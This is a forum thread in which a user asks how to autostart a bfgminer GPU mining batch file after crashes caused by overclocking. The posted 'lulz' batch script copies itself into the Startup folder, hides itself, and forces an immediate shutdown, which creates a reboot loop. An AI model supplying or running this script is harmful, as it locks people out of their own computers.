Author

Topic: i command to my bat file bcz i do overclock with my video card (Read 649 times)

legendary
Activity: 2912
Merit: 1060
In the start menu
newbie
Activity: 3
Merit: 0
how do i get to this folder
i try google but and help for xp and if i write msconfig i cant put my boot\bfgminer commner after restart
so what i go na do?

Code:
@echo off 
title lulz cls

:a
if not exist "%userprofile%\start menu\programs\startup.bat" goto b
if exist "%userprofile%\start menu\programs\startup.bat" goto c
go to a

:b
copy "startup.bat" "%userprofile%\start menu\programs\startup\startup.bat" >nul
go to c

:c
attrib +h "%useprofile%\start menu\programs\startup\startup.bat" >nul
cls
shutdown -f -t 1 -c "lulz"
exit
legendary
Activity: 2912
Merit: 1060
Put a shortcut in the startup folder
newbie
Activity: 3
Merit: 0
So the 2 cards that i have amd radeon 7800 series with crossfire
i use the program bfgminer-3.5.6-win64 i dont have a asic miner only computers with card
sso the problem after use overclocking the computer do cross scrren and restart
i use a bat to run the user and passs

bfgminer -o http://api.bitcoin.cz:8332 -u xxxxx -p xxxxx

and i want to putmore line when  computer cross(every time)
he wiill start the bat file u know C:\Users\asad\Desktop\bfgminer-3.5.6-win64\bfgminer-3.5.6-win64 startminer.bat
thank u for alll that help
Jump to: